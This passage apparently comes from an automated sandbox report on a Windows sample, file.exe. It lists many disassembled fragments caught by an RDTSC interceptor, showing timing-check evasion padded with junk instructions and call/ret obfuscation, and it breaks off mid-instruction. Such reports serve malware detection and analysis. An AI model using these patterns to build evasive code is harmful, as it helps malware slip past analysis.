                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108F50F second address: 108F515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108F593 second address: 108F598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108F598 second address: 108F628 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b add cl, FFFFFFB6h 0x0000000e push 00000000h 0x00000010 add edi, 5EF8A986h 0x00000016 push 3D6B5E68h 0x0000001b push edx 0x0000001c ja 00007FBD38EF616Ch 0x00000022 pop edx 0x00000023 xor dword ptr [esp], 3D6B5EE8h 0x0000002a sub dword ptr [ebp+122D2A9Ah], ecx 0x00000030 push 00000003h 0x00000032 or dword ptr [ebp+122D1AACh], esi 0x00000038 push 00000000h 0x0000003a jo 00007FBD38EF616Ch 0x00000040 add esi, dword ptr [ebp+122D3842h] 0x00000046 push 00000003h 0x00000048 mov dl, 27h 0x0000004a push 992F358Ch 0x0000004f jmp 00007FBD38EF6171h 0x00000054 xor dword ptr [esp], 592F358Ch 0x0000005b jo 00007FBD38EF616Ah 0x00000061 push ebx 0x00000062 push ebx 0x00000063 pop edx 0x00000064 pop ecx 0x00000065 lea ebx, dword ptr [ebp+124513D6h] 0x0000006b mov edi, dword ptr [ebp+122D29E1h] 0x00000071 xchg eax, ebx 0x00000072 push eax 0x00000073 push edx 0x00000074 pushad 0x00000075 jne 00007FBD38EF6166h 0x0000007b pushad 0x0000007c popad 0x0000007d popad 0x0000007e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108F628 second address: 108F62E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108F62E second address: 108F632 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108F775 second address: 108F779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108F7B6 second address: 108F81F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBD38EF6175h 0x00000008 jmp 00007FBD38EF616Bh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007FBD38EF6168h 0x00000018 pop edx 0x00000019 nop 0x0000001a pushad 0x0000001b mov di, dx 0x0000001e je 00007FBD38EF616Ch 0x00000024 popad 0x00000025 push 00000000h 0x00000027 pushad 0x00000028 sub ah, 0000000Eh 0x0000002b popad 0x0000002c call 00007FBD38EF6169h 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FBD38EF6174h 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108F81F second address: 108F851 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBD3971C787h 0x00000008 jmp 00007FBD3971C77Ch 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108F851 second address: 108F898 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBD38EF616Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push eax 0x00000010 jmp 00007FBD38EF616Ch 0x00000015 pop eax 0x00000016 pop eax 0x00000017 mov eax, dword ptr [eax] 0x00000019 push eax 0x0000001a jmp 00007FBD38EF6176h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108F898 second address: 108F89E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108F89E second address: 108F8A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108F8A3 second address: 108F8AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FBD3971C776h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E40A second address: 107E41F instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBD38EF6168h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E41F second address: 107E424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF1B4 second address: 10AF1BE instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBD38EF6166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF615 second address: 10AF61B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF761 second address: 10AF772 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FBD38EF616Bh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF8E8 second address: 10AF90C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD3971C77Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FBD3971C784h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF90C second address: 10AF911 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AFE84 second address: 10AFE8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AFE8A second address: 10AFE9A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AFE9A second address: 10AFEB2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBD3971C776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007FBD3971C776h 0x00000012 jne 00007FBD3971C776h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AFEB2 second address: 10AFEB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A4032 second address: 10A404B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBD3971C785h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A404B second address: 10A4056 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A4056 second address: 10A4067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007FBD3971C77Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A4067 second address: 10A4079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jmp 00007FBD38EF616Ch 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B044E second address: 10B0453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B0DEF second address: 10B0DFF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007FBD38EF6185h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1084CDF second address: 1084CE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1084CE3 second address: 1084CE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B79A1 second address: 10B79AB instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBD3971C776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B79AB second address: 10B79B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B6339 second address: 10B6343 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBD3971C776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B6A9A second address: 10B6A9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B6A9F second address: 10B6AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d jl 00007FBD3971C776h 0x00000013 pop eax 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB5D7 second address: 10BB5FB instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBD38EF6166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jno 00007FBD38EF617Ah 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BA9EE second address: 10BAA12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD3971C785h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FBD3971C77Bh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB2E9 second address: 10BB2F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB46E second address: 10BB474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB474 second address: 10BB478 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB478 second address: 10BB493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jo 00007FBD3971C77Ch 0x0000000d jnc 00007FBD3971C776h 0x00000013 push eax 0x00000014 push edx 0x00000015 je 00007FBD3971C776h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BD163 second address: 10BD178 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD38EF616Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BD178 second address: 10BD17D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BD17D second address: 10BD183 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BD183 second address: 10BD187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BD187 second address: 10BD18B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BDC16 second address: 10BDC1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BDC1C second address: 10BDC54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD38EF616Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FBD38EF616Fh 0x00000011 xchg eax, ebx 0x00000012 push ecx 0x00000013 movzx edi, di 0x00000016 pop edi 0x00000017 nop 0x00000018 push eax 0x00000019 push edx 0x0000001a jbe 00007FBD38EF616Ch 0x00000020 js 00007FBD38EF6166h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BDC54 second address: 10BDC63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBD3971C77Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BDC63 second address: 10BDC85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD38EF6170h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BDC85 second address: 10BDC89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BDD21 second address: 10BDD25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BDD25 second address: 10BDD29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BDD29 second address: 10BDD2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BDDE5 second address: 10BDDF6 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBD3971C776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BDDF6 second address: 10BDDFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BDDFA second address: 10BDE13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD3971C781h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BE07A second address: 10BE07F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BE25A second address: 10BE264 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BE264 second address: 10BE268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BE2F3 second address: 10BE2F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BE2F9 second address: 10BE2FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BE878 second address: 10BE87D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BF198 second address: 10BF1F4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBD38EF6178h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f jns 00007FBD38EF616Ch 0x00000015 mov esi, dword ptr [ebp+122D367Eh] 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push eax 0x00000020 call 00007FBD38EF6168h 0x00000025 pop eax 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a add dword ptr [esp+04h], 00000019h 0x00000032 inc eax 0x00000033 push eax 0x00000034 ret 0x00000035 pop eax 0x00000036 ret 0x00000037 mov dword ptr [ebp+1247CD60h], eax 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BF1F4 second address: 10BF1FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BF1FA second address: 10BF1FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BF1FF second address: 10BF204 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C01A6 second address: 10C0245 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007FBD38EF6168h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 0000001Ch 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ecx 0x00000028 call 00007FBD38EF6168h 0x0000002d pop ecx 0x0000002e mov dword ptr [esp+04h], ecx 0x00000032 add dword ptr [esp+04h], 00000016h 0x0000003a inc ecx 0x0000003b push ecx 0x0000003c ret 0x0000003d pop ecx 0x0000003e ret 0x0000003f jmp 00007FBD38EF6179h 0x00000044 mov dword ptr [ebp+122D2C0Eh], edi 0x0000004a push 00000000h 0x0000004c mov esi, dword ptr [ebp+122D38CEh] 0x00000052 xchg eax, ebx 0x00000053 jo 00007FBD38EF6185h 0x00000059 pushad 0x0000005a jl 00007FBD38EF6166h 0x00000060 jmp 00007FBD38EF6177h 0x00000065 popad 0x00000066 push eax 0x00000067 pushad 0x00000068 pushad 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C149C second address: 10C14A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C201B second address: 10C2020 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C14A0 second address: 10C14A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C667B second address: 10C6685 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C6948 second address: 10C694E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C78C6 second address: 10C78DE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBD38EF616Dh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C78DE second address: 10C78E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C78E4 second address: 10C78E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CB4F8 second address: 10CB502 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FBD3971C776h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CA757 second address: 10CA75B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CB502 second address: 10CB506 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CB5C8 second address: 10CB5D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FBD38EF6166h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CD8FE second address: 10CD903 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D088E second address: 10D08A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBD38EF616Fh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D1B1A second address: 10D1B24 instructions: 0x00000000 rdtsc 0x00000002 je 00007FBD3971C77Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D29EE second address: 10D29F8 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBD38EF6166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D0978 second address: 10D098A instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBD3971C776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D4982 second address: 10D498D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FBD38EF6166h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D098A second address: 10D098E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D58A3 second address: 10D58D1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBD38EF6174h 0x00000008 jmp 00007FBD38EF616Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 jnp 00007FBD38EF616Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 jng 00007FBD38EF6166h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D39FF second address: 10D3A7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007FBD3971C778h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 cmc 0x00000024 push dword ptr fs:[00000000h] 0x0000002b and ebx, dword ptr [ebp+122D296Dh] 0x00000031 mov dword ptr fs:[00000000h], esp 0x00000038 mov eax, dword ptr [ebp+122D15C9h] 0x0000003e push 00000000h 0x00000040 push edx 0x00000041 call 00007FBD3971C778h 0x00000046 pop edx 0x00000047 mov dword ptr [esp+04h], edx 0x0000004b add dword ptr [esp+04h], 0000001Ah 0x00000053 inc edx 0x00000054 push edx 0x00000055 ret 0x00000056 pop edx 0x00000057 ret 0x00000058 mov edi, dword ptr [ebp+122D38AAh] 0x0000005e xor dword ptr [ebp+122D1AF5h], ecx 0x00000064 push FFFFFFFFh 0x00000066 mov dword ptr 